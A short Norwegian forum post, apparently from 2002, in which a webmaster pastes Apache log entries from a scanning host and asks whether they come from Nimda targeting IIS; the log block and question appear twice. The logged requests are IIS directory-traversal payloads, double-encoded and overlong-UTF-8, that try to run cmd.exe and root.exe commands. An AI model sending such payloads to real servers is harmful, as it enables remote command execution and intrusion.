får slike raid som dette på apache servern min av og til:
148.247.10.9 - - [09/Mar/2002:09:42:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:16 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:19 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
er det nimda virus eller noe slikt?
virker som det er rettet mot webserveren til ms (iis)
noen som har peil?
148.247.10.9 - - [09/Mar/2002:09:42:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
148.247.10.9 - - [09/Mar/2002:09:42:11 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
148.247.10.9 - - [09/Mar/2002:09:42:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:15 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:16 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
148.247.10.9 - - [09/Mar/2002:09:42:17 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:19 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
148.247.10.9 - - [09/Mar/2002:09:42:20 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
er det nimda virus eller noe slikt?
virker som det er rettet mot webserveren til ms (iis)
noen som har peil?